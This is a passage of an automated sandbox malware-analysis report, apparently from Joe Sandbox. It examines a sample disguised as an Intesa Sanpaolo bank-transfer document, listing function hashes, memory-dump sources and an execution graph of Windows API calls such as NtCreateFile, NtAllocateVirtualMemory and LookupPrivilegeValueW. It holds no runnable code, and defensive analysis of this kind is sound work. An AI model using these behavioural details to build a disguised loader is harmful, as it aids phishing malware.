                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fadf82f1a554766bb4dbaa9084e4be0c92e6941a1876126becfae4b6f653b2b7
                                  • Instruction ID: a2c56ce03870c71a5c4febc1ae0f82e2a30698fd0729445e364d4ba178959b00
                                  • Opcode Fuzzy Hash: fadf82f1a554766bb4dbaa9084e4be0c92e6941a1876126becfae4b6f653b2b7
                                  • Instruction Fuzzy Hash: 2BE0E2B0D04248EFCB84EFA9E5457ADFBF8AB44200F1080AE8928A3280E6755B40CF81
                                  Function 06C08A49 Relevance: .0, Instructions: 14COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 256e9d27990e8a21485b76ddee0a6f8cf094c45fec054637e237ae75006d5c9f
                                  • Instruction ID: afade1558236a5ccb413f20000fd44ffd668ad823ccba3c5c9a9a49346c5b180
                                  • Opcode Fuzzy Hash: 256e9d27990e8a21485b76ddee0a6f8cf094c45fec054637e237ae75006d5c9f
                                  • Instruction Fuzzy Hash: 61D06CE280E3D44FEB57537058684567FB29EA321171B41EBC0C49B1E3E5150C6AA362
                                  Function 06C02609 Relevance: .0, Instructions: 13COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 85b9147125b34ee0985952da3e5868cde31605af2e2a01fa8dd2919b214cf849
                                  • Instruction ID: 2fa04c5c0a1cc8c60ef8521951cf1b395fadbae2f2e7cc0132245fb59569ad95
                                  • Opcode Fuzzy Hash: 85b9147125b34ee0985952da3e5868cde31605af2e2a01fa8dd2919b214cf849
                                  • Instruction Fuzzy Hash: 6CD09EB78050049FD7015B90D848D84BF66EB58310F0B8091E6494B472E6628971EB41
                                  Function 06C0F542 Relevance: .0, Instructions: 13COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 196e92ffd44f2c9f6b60559b0b9e2af40b40fa230a642983205b5b1a5e0d607b
                                  • Instruction ID: d7814976399b1d3f807bbfc67292f84d447da841c9001dd236ae972482ed0aa0
                                  • Opcode Fuzzy Hash: 196e92ffd44f2c9f6b60559b0b9e2af40b40fa230a642983205b5b1a5e0d607b
                                  • Instruction Fuzzy Hash: 72D05EF1409240EFE3504B20C6685947B77EB0A302B010499D91E5F153E3304981CF51
                                  Function 06C02618 Relevance: .0, Instructions: 10COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6a139c41f151743a56a3d2fbf655d2c76c0570918b7393e956def84501808254
                                  • Instruction ID: 8b5838909e01249031ca2e33acdd46892f3a1a22c7d89813ea4dc353c93c3265
                                  • Opcode Fuzzy Hash: 6a139c41f151743a56a3d2fbf655d2c76c0570918b7393e956def84501808254
                                  • Instruction Fuzzy Hash: 86C0023B041108EFCB026F80E908C85BFAAEB58310705C491F6094A432DB72E574EF51
                                  Function 06C0D890 Relevance: .0, Instructions: 10COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8a5e11da4c3c98dd3d35f68f4e1a3fa1d479cda93f2d5a40ad060c6f42ece361
                                  • Instruction ID: 958ed29bceb307b8253c2a35b2c4ca658f228fdb56ab75820aa152fe1ef10e03
                                  • Opcode Fuzzy Hash: 8a5e11da4c3c98dd3d35f68f4e1a3fa1d479cda93f2d5a40ad060c6f42ece361
                                  • Instruction Fuzzy Hash: 70C08CB00023088BE2106799E40D328B6AABB02312F00002DA71D024E05B605040CBA6
                                  Function 06C0A580 Relevance: .0, Instructions: 9COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a57b60f2f8417cff43c60df75653b414d2db5e6fac475bab989ca12fffaefd31
                                  • Instruction ID: db9e8ff1830ed792caa82e8f87bbf645e3cb6c63590e7f09133005d97b1c6f1d
                                  • Opcode Fuzzy Hash: a57b60f2f8417cff43c60df75653b414d2db5e6fac475bab989ca12fffaefd31
                                  • Instruction Fuzzy Hash: 6AC02BB7C0534037E39113209C01A426A125B38710F2744B1B1C422180C0200CBCE3A7
                                  Function 06C08D94 Relevance: .0, Instructions: 8COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f9c3e48a3bf1c29a6ef2991dc88beebd9a07f9deadbf48354b7ab8bde00a38be
                                  • Instruction ID: 6ecdf3cdb4f530701d52a28441ff147ef1fb7fbbdcc913891d5b88a23a11f2f1
                                  • Opcode Fuzzy Hash: f9c3e48a3bf1c29a6ef2991dc88beebd9a07f9deadbf48354b7ab8bde00a38be
                                  • Instruction Fuzzy Hash: BAB0127E156701B5B5C563A98C59B2E6411FFB9B00B50CC02B259040D494F08539A11F
                                  Function 06C05CF0 Relevance: .0, Instructions: 3COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f742997f61fd7af710357393f4826caa253fd44aceacaf5743750927357d0564
                                  • Instruction ID: acc7987eca6d8c4a369228e8de6c85beffa74abc17423b7b3eff2d17d4bbb99d
                                  • Opcode Fuzzy Hash: f742997f61fd7af710357393f4826caa253fd44aceacaf5743750927357d0564
                                  • Instruction Fuzzy Hash: E1A002B490D245DFF7605F52D12C36C7B75B704319F448055E516566C9DB781144DF41

                                  Non-executed Functions

                                  Function 073B9708 Relevance: 2.8, Strings: 2, Instructions: 298COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: PHp$PHp
                                  • API String ID: 0-4032155144
                                  • Opcode ID: 08f24ca132fd0db9853d9bd33e8a120dbb0cef6eefe097a4993465adea22d8e2
                                  • Instruction ID: 18accb624ce47f3a6dc5775a6153b914988f48fa7ed7c8281cfa0e2c605fe716
                                  • Opcode Fuzzy Hash: 08f24ca132fd0db9853d9bd33e8a120dbb0cef6eefe097a4993465adea22d8e2
                                  • Instruction Fuzzy Hash: CBD1A2B4A00605CFEB14DF69C598BE9B7F1BF49701F2580A8E609AB771DB31AD40CB60
                                  Function 073B4320 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: {:o
                                  • API String ID: 0-750842120
                                  • Opcode ID: 7b6bf4f13415b4d88b585ae8fb0f29b8fe712a19b2e6229f7f41e2ab362c434e
                                  • Instruction ID: 9b7121c491585a43bc638f370fc51a90627b4312f88f518791e82d749b984b48
                                  • Opcode Fuzzy Hash: 7b6bf4f13415b4d88b585ae8fb0f29b8fe712a19b2e6229f7f41e2ab362c434e
                                  • Instruction Fuzzy Hash: 03E16DB4E102598FDB14CF99C5809AEFBF2FF89304F24816AD558AB35AD7309941CF64
                                  Function 073B1E78 Relevance: .3, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: af1216c9387645e347c7bdbd7ed5b757a22f43774ce112b10b515037caea2d6b
                                  • Instruction ID: 2475720d9ab9f6e29281b5b81547a4038cb6bc94dae4a4569f1675e18330be61
                                  • Opcode Fuzzy Hash: af1216c9387645e347c7bdbd7ed5b757a22f43774ce112b10b515037caea2d6b
                                  • Instruction Fuzzy Hash: 65E13CB4E101198FDB14DFA9C5809AEFBF2FF89304F24826AD519AB359D730A941CF61
                                  Function 073B26E8 Relevance: .3, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2273175477374d9ebf787003a2ad2888f0e32a1ea030f801990d3eede8f1a087
                                  • Instruction ID: 1bc0c485ed3551950cc4f37e354efabd3047911f861902a72e8a8bdc10658191
                                  • Opcode Fuzzy Hash: 2273175477374d9ebf787003a2ad2888f0e32a1ea030f801990d3eede8f1a087
                                  • Instruction Fuzzy Hash: 7CE10CB4E101198FDB14DFA9C580AAEFBF2FF49304F24826AE559AB359D7309941CF60
                                  Function 073B3EE8 Relevance: .3, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2dafe228bb976e6e1d148d3201ef81c57afe1dbd55fa5fb7b73e96d76eed269d
                                  • Instruction ID: 39894936d3e7744dd9ac77b0f94064674b1373ebbc9674d737af7875ab894d7b
                                  • Opcode Fuzzy Hash: 2dafe228bb976e6e1d148d3201ef81c57afe1dbd55fa5fb7b73e96d76eed269d
                                  • Instruction Fuzzy Hash: EDE13CB4E101598FDB14CFA9C5809AEFBF2FF89304F248169D549AB35AD730A941CF64
                                  Function 073B22B0 Relevance: .3, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5ef5f111f5fa2e91fc51622b5fd4fba16b1947e1ce88e46b2a6719afc2d2fa68
                                  • Instruction ID: a8b28dd1b537cae7cc4a4da255efc76706caba3034f94fe0372c98cf3a09171f
                                  • Opcode Fuzzy Hash: 5ef5f111f5fa2e91fc51622b5fd4fba16b1947e1ce88e46b2a6719afc2d2fa68
                                  • Instruction Fuzzy Hash: BFE11CB4E101198FDB14DF99C5809AEFBF2FF49304F24826AE559AB359D730A941CF60
                                  Function 073B69D3 Relevance: .0, Instructions: 19COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 14a122d969254b1d772df803d5f5d11f2cb44fa8f3d51ddc68396369f768acfa
                                  • Instruction ID: bbe7aef0b239451e533ec2d7e4e35befb8a666da94a94a4ea9c140d8e2a9d1b2
                                  • Opcode Fuzzy Hash: 14a122d969254b1d772df803d5f5d11f2cb44fa8f3d51ddc68396369f768acfa
                                  • Instruction Fuzzy Hash: 8CC012E5DAF1489AD710099064140F4B73CCACB022F003153E71DA7C02922681294354

                                  Execution Graph

                                  Execution Coverage:1.4%
                                  Dynamic/Decrypted Code Coverage:2.7%
                                  Signature Coverage:5.8%
                                  Total number of Nodes:555
                                  Total number of Limit Nodes:70
                                  execution_graph 92541 1102ad0 LdrInitializeThunk 92544 41f120 92547 41b970 92544->92547 92548 41b996 92547->92548 92555 409d40 92548->92555 92550 41b9a2 92551 41b9c3 92550->92551 92563 40c1c0 92550->92563 92553 41b9b5 92599 41a6b0 92553->92599 92602 409c90 92555->92602 92557 409d4d 92558 409d54 92557->92558 92614 409c30 92557->92614 92558->92550 92564 40c1e5 92563->92564 93032 40b1c0 92564->93032 92566 40c23c 93036 40ae40 92566->93036 92568 40c4b3 92568->92553 92569 40c262 92569->92568 93045 4143a0 92569->93045 92571 40c2a7 92571->92568 93048 408a60 92571->93048 92573 40c2eb 92573->92568 93055 41a500 92573->93055 92577 40c341 92578 40c348 92577->92578 93067 41a010 92577->93067 92579 41bdc0 2 API calls 92578->92579 92581 40c355 92579->92581 92581->92553 92583 40c392 92584 41bdc0 2 API calls 92583->92584 92585 40c399 92584->92585 92585->92553 92586 40c3a2 92587 40f4a0 3 API calls 92586->92587 92588 40c416 92587->92588 92588->92578 92589 40c421 92588->92589 92590 41bdc0 2 API calls 92589->92590 92591 40c445 92590->92591 93072 41a060 92591->93072 92594 41a010 2 API calls 92595 40c480 92594->92595 92595->92568 93077 419e20 92595->93077 92598 41a6b0 2 API calls 92598->92568 92600 41af60 LdrLoadDll 92599->92600 92601 41a6cf ExitProcess 92600->92601 92601->92551 92603 409ca3 92602->92603 92653 418bc0 LdrLoadDll 92602->92653 92633 418a70 92603->92633 92606 409cb6 92606->92557 92607 409cac 92607->92606 92636 41b2b0 92607->92636 92609 409cf3 92609->92606 92647 409ab0 92609->92647 92611 409d13 92654 409620 LdrLoadDll 92611->92654 92613 409d25 92613->92557 92615 409c4a 92614->92615 92616 41b5a0 LdrLoadDll 92614->92616 93007 41b5a0 92615->93007 92616->92615 92619 41b5a0 LdrLoadDll 92620 409c71 92619->92620 92621 40f180 92620->92621 92622 40f199 92621->92622 93015 40b040 92622->93015 92624 40f1ac 93019 41a1e0 92624->93019 92627 409d65 92627->92550 92629 40f1d2 92630 40f1fd 92629->92630 93025 41a260 92629->93025 92632 41a490 2 API calls 92630->92632 92632->92627 92655 41a600 92633->92655 92637 41b2c9 92636->92637 92669 414a50 92637->92669 92639 41b2e1 92640 41b2ea 92639->92640 92708 41b0f0 92639->92708 92640->92609 92642 41b2fe 92642->92640 92726 419f00 92642->92726 92985 407ea0 92647->92985 92649 409ad1 92649->92611 92650 409aca 92650->92649 92998 408160 92650->92998 92653->92603 92654->92613 92656 41a616 92655->92656 92659 41af60 92656->92659 92658 418a85 92658->92607 92660 41af70 92659->92660 92661 41af92 92659->92661 92663 414e50 92660->92663 92661->92658 92664 414e5e 92663->92664 92666 414e6a 92663->92666 92664->92666 92668 4152d0 LdrLoadDll 92664->92668 92666->92661 92667 414fbc 92667->92661 92668->92667 92670 414d85 92669->92670 92680 414a64 92669->92680 92670->92639 92673 414b90 92738 41a360 92673->92738 92674 414b73 92795 41a460 LdrLoadDll 92674->92795 92677 414bb7 92679 41bdc0 2 API calls 92677->92679 92678 414b7d 92678->92639 92682 414bc3 92679->92682 92680->92670 92735 419c50 92680->92735 92681 414d49 92684 41a490 2 API calls 92681->92684 92682->92678 92682->92681 92683 414d5f 92682->92683 92688 414c52 92682->92688 92804 414790 LdrLoadDll NtReadFile NtClose 92683->92804 92686 414d50 92684->92686 92686->92639 92687 414d72 92687->92639 92689 414cb9 92688->92689 92691 414c61 92688->92691 92689->92681 92690 414ccc 92689->92690 92797 41a2e0 92690->92797 92693 414c66 92691->92693 92694 414c7a 92691->92694 92796 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 92693->92796 92697 414c97 92694->92697 92698 414c7f 92694->92698 92697->92686 92753 414410 92697->92753 92741 4146f0 92698->92741 92700 414c70 92700->92639 92703 414d2c 92801 41a490 92703->92801 92704 414c8d 92704->92639 92705 414caf 92705->92639 92707 414d38 92707->92639 92710 41b101 92708->92710 92709 41b113 92709->92642 92710->92709 92822 41bd40 92710->92822 92712 41b134 92715 41b157 92712->92715 92825 414070 92712->92825 92714 41b180 92714->92642 92715->92714 92716 414070 3 API calls 92715->92716 92717 41b179 92716->92717 92717->92714 92857 415390 92717->92857 92719 41b21a 92867 41ad70 92719->92867 92720 41b20a 92720->92719 92951 41af00 LdrLoadDll 92720->92951 92723 41b248 92946 419ec0 92723->92946 92727 419f0c 92726->92727 92728 41af60 LdrLoadDll 92727->92728 92729 419f1c 92728->92729 92979 1102c0a 92729->92979 92730 419f37 92732 41bdc0 92730->92732 92982 41a670 92732->92982 92734 41b359 92734->92609 92736 41af60 LdrLoadDll 92735->92736 92737 414b44 92735->92737 92736->92737 92737->92673 92737->92674 92737->92678 92739 41a37c NtCreateFile 92738->92739 92740 41af60 LdrLoadDll 92738->92740 92739->92677 92740->92739 92742 41470c 92741->92742 92743 41a2e0 LdrLoadDll 92742->92743 92744 41472d 92743->92744 92745 414734 92744->92745 92746 414748 92744->92746 92747 41a490 2 API calls 92745->92747 92748 41a490 2 API calls 92746->92748 92750 41473d 92747->92750 92749 414751 92748->92749 92805 41bfd0 LdrLoadDll RtlAllocateHeap 92749->92805 92750->92704 92752 41475c 92752->92704 92754 41445b 92753->92754 92755 41448e 92753->92755 92756 41a2e0 LdrLoadDll 92754->92756 92757 4145d9 92755->92757 92761 4144aa 92755->92761 92759 414476 92756->92759 92758 41a2e0 LdrLoadDll 92757->92758 92765 4145f4 92758->92765 92760 41a490 2 API calls 92759->92760 92762 41447f 92760->92762 92763 41a2e0 LdrLoadDll 92761->92763 92762->92705 92764 4144c5 92763->92764 92767 4144e1 92764->92767 92768 4144cc 92764->92768 92818 41a320 LdrLoadDll 92765->92818 92769 4144e6 92767->92769 92770 4144fc 92767->92770 92772 41a490 2 API calls 92768->92772 92774 41a490 2 API calls 92769->92774 92782 414501 92770->92782 92806 41bf90 92770->92806 92771 41462e 92775 41a490 2 API calls 92771->92775 92773 4144d5 92772->92773 92773->92705 92777 4144ef 92774->92777 92776 414639 92775->92776 92776->92705 92777->92705 92778 414513 92778->92705 92781 414567 92783 41457e 92781->92783 92817 41a2a0 LdrLoadDll 92781->92817 92782->92778 92809 41a410 92782->92809 92785 414585 92783->92785 92786 41459a 92783->92786 92787 41a490 2 API calls 92785->92787 92788 41a490 2 API calls 92786->92788 92787->92778 92789 4145a3 92788->92789 92790 4145cf 92789->92790 92812 41bb90 92789->92812 92790->92705 92792 4145ba 92793 41bdc0 2 API calls 92792->92793 92794 4145c3 92793->92794 92794->92705 92795->92678 92796->92700 92798 414d14 92797->92798 92799 41af60 LdrLoadDll 92797->92799 92800 41a320 LdrLoadDll 92798->92800 92799->92798 92800->92703 92802 41af60 LdrLoadDll 92801->92802 92803 41a4ac NtClose 92802->92803 92803->92707 92804->92687 92805->92752 92808 41bfa8 92806->92808 92819 41a630 92806->92819 92808->92782 92810 41a42c NtReadFile 92809->92810 92811 41af60 LdrLoadDll 92809->92811 92810->92781 92811->92810 92813 41bbb4 92812->92813 92814 41bb9d 92812->92814 92813->92792 92814->92813 92815 41bf90 2 API calls 92814->92815 92816 41bbcb 92815->92816 92816->92792 92817->92783 92818->92771 92820 41af60 LdrLoadDll 92819->92820 92821 41a64c RtlAllocateHeap 92820->92821 92821->92808 92952 41a540 92822->92952 92824 41bd6d 92824->92712 92826 414081 92825->92826 92827 414089 92825->92827 92826->92715 92856 41435c 92827->92856 92955 41cf30 92827->92955 92829 4140dd 92830 41cf30 2 API calls 92829->92830 92833 4140e8 92830->92833 92831 414136 92834 41cf30 2 API calls 92831->92834 92833->92831 92835 41d060 3 API calls 92833->92835 92966 41cfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 92833->92966 92837 41414a 92834->92837 92835->92833 92836 4141a7 92838 41cf30 2 API calls 92836->92838 92837->92836 92960 41d060 92837->92960 92839 4141bd 92838->92839 92841 4141fa 92839->92841 92843 41d060 3 API calls 92839->92843 92842 41cf30 2 API calls 92841->92842 92844 414205 92842->92844 92843->92839 92845 41423f 92844->92845 92846 41d060 3 API calls 92844->92846 92967 41cf90 LdrLoadDll RtlFreeHeap 92845->92967 92846->92844 92848 414334 92968 41cf90 LdrLoadDll RtlFreeHeap 92848->92968 92850 41433e 92969 41cf90 LdrLoadDll RtlFreeHeap 92850->92969 92852 414348 92970 41cf90 LdrLoadDll RtlFreeHeap 92852->92970 92854 414352 92971 41cf90 LdrLoadDll RtlFreeHeap 92854->92971 92856->92715 92858 4153a1 92857->92858 92859 414a50 8 API calls 92858->92859 92861 4153b7 92859->92861 92860 41540a 92860->92720 92861->92860 92862 4153f2 92861->92862 92863 415405 92861->92863 92864 41bdc0 2 API calls 92862->92864 92865 41bdc0 2 API calls 92863->92865 92866 4153f7 92864->92866 92865->92860 92866->92720 92868 41ad84 92867->92868 92869 41ac30 LdrLoadDll 92867->92869 92972 41ac30 92868->92972 92869->92868 92872 41ac30 LdrLoadDll 92873 41ad96 92872->92873 92874 41ac30 LdrLoadDll 92873->92874 92875 41ad9f 92874->92875 92876 41ac30 LdrLoadDll 92875->92876 92877 41ada8 92876->92877 92878 41ac30 LdrLoadDll 92877->92878 92879 41adb1 92878->92879 92880 41ac30 LdrLoadDll 92879->92880 92881 41adbd 92880->92881 92882 41ac30 LdrLoadDll 92881->92882 92883 41adc6 92882->92883 92884 41ac30 LdrLoadDll 92883->92884 92885 41adcf 92884->92885 92886 41ac30 LdrLoadDll 92885->92886 92887 41add8 92886->92887 92888 41ac30 LdrLoadDll 92887->92888 92889 41ade1 92888->92889 92890 41ac30 LdrLoadDll 92889->92890 92891 41adea 92890->92891 92892 41ac30 LdrLoadDll 92891->92892 92893 41adf6 92892->92893 92894 41ac30 LdrLoadDll 92893->92894 92895 41adff 92894->92895 92896 41ac30 LdrLoadDll 92895->92896 92897 41ae08 92896->92897 92898 41ac30 LdrLoadDll 92897->92898 92899 41ae11 92898->92899 92900 41ac30 LdrLoadDll 92899->92900 92901 41ae1a 92900->92901 92902 41ac30 LdrLoadDll 92901->92902 92903 41ae23 92902->92903 92904 41ac30 LdrLoadDll 92903->92904 92905 41ae2f 92904->92905 92906 41ac30 LdrLoadDll 92905->92906 92907 41ae38 92906->92907 92908 41ac30 LdrLoadDll 92907->92908 92909 41ae41 92908->92909 92910 41ac30 LdrLoadDll 92909->92910 92911 41ae4a 92910->92911 92912 41ac30 LdrLoadDll 92911->92912 92913 41ae53 92912->92913 92914 41ac30 LdrLoadDll 92913->92914 92915 41ae5c 92914->92915 92916 41ac30 LdrLoadDll 92915->92916 92917 41ae68 92916->92917 92918 41ac30 LdrLoadDll 92917->92918 92919 41ae71 92918->92919 92920 41ac30 LdrLoadDll 92919->92920 92921 41ae7a 92920->92921 92922 41ac30 LdrLoadDll 92921->92922 92923 41ae83 92922->92923 92924 41ac30 LdrLoadDll 92923->92924 92925 41ae8c 92924->92925 92926 41ac30 LdrLoadDll 92925->92926 92927 41ae95 92926->92927 92928 41ac30 LdrLoadDll 92927->92928 92929 41aea1 92928->92929 92930 41ac30 LdrLoadDll 92929->92930 92931 41aeaa 92930->92931 92932 41ac30 LdrLoadDll 92931->92932 92933 41aeb3 92932->92933 92934 41ac30 LdrLoadDll 92933->92934 92935 41aebc 92934->92935 92936 41ac30 LdrLoadDll 92935->92936 92937 41aec5 92936->92937 92938 41ac30 LdrLoadDll 92937->92938 92939 41aece 92938->92939 92940 41ac30 LdrLoadDll 92939->92940 92941 41aeda 92940->92941 92942 41ac30 LdrLoadDll 92941->92942 92943 41aee3 92942->92943 92944 41ac30 LdrLoadDll 92943->92944 92945 41aeec 92944->92945 92945->92723 92947 41af60 LdrLoadDll 92946->92947 92948 419edc 92947->92948 92978 1102df0 LdrInitializeThunk 92948->92978 92949 419ef3 92949->92642 92951->92719 92953 41af60 LdrLoadDll 92952->92953 92954 41a55c NtAllocateVirtualMemory 92953->92954 92954->92824 92956 41cf40 92955->92956 92957 41cf46 92955->92957 92956->92829 92958 41bf90 2 API calls 92957->92958 92959 41cf6c 92958->92959 92959->92829 92961 41cfd0 92960->92961 92962 41bf90 2 API calls 92961->92962 92963 41d02d 92961->92963 92964 41d00a 92962->92964 92963->92837 92965 41bdc0 2 API calls 92964->92965 92965->92963 92966->92833 92967->92848 92968->92850 92969->92852 92970->92854 92971->92856 92973 41ac4b 92972->92973 92974 414e50 LdrLoadDll 92973->92974 92975 41ac6b 92974->92975 92976 414e50 LdrLoadDll 92975->92976 92977 41ad17 92975->92977 92976->92977 92977->92872 92978->92949 92980 1102c11 92979->92980 92981 1102c1f LdrInitializeThunk 92979->92981 92980->92730 92981->92730 92983 41a68c RtlFreeHeap 92982->92983 92984 41af60 LdrLoadDll 92982->92984 92983->92734 92984->92983 92986 407eb0 92985->92986 92987 407eab 92985->92987 92988 41bd40 2 API calls 92986->92988 92987->92650 92991 407ed5 92988->92991 92989 407f38 92989->92650 92990 419ec0 2 API calls 92990->92991 92991->92989 92991->92990 92992 407f3e 92991->92992 92996 41bd40 2 API calls 92991->92996 93001 41a5c0 92991->93001 92994 407f64 92992->92994 92995 41a5c0 2 API calls 92992->92995 92994->92650 92997 407f55 92995->92997 92996->92991 92997->92650 92999 40817e 92998->92999 93000 41a5c0 2 API calls 92998->93000 92999->92611 93000->92999 93002 41af60 LdrLoadDll 93001->93002 93003 41a5dc 93002->93003 93006 1102c70 LdrInitializeThunk 93003->93006 93004 41a5f3 93004->92991 93006->93004 93008 41b5c3 93007->93008 93011 40acf0 93008->93011 93012 40ad14 93011->93012 93013 40ad50 LdrLoadDll 93012->93013 93014 409c5b 93012->93014 93013->93014 93014->92619 93016 40b063 93015->93016 93018 40b0e0 93016->93018 93030 419c90 LdrLoadDll 93016->93030 93018->92624 93020 41af60 LdrLoadDll 93019->93020 93021 40f1bb 93020->93021 93021->92627 93022 41a7d0 93021->93022 93023 41a7ef LookupPrivilegeValueW 93022->93023 93024 41af60 LdrLoadDll 93022->93024 93023->92629 93024->93023 93026 41a27c 93025->93026 93027 41af60 LdrLoadDll 93025->93027 93031 1102ea0 LdrInitializeThunk 93026->93031 93027->93026 93028 41a29b 93028->92630 93030->93018 93031->93028 93033 40b1f0 93032->93033 93034 40b040 LdrLoadDll 93033->93034 93035 40b204 93034->93035 93035->92566 93037 40ae51 93036->93037 93038 40ae4d 93036->93038 93039 40ae6a 93037->93039 93040 40ae9c 93037->93040 93038->92569 93082 419cd0 LdrLoadDll 93039->93082 93083 419cd0 LdrLoadDll 93040->93083 93042 40aead 93042->92569 93044 40ae8c 93044->92569 93046 40f4a0 3 API calls 93045->93046 93047 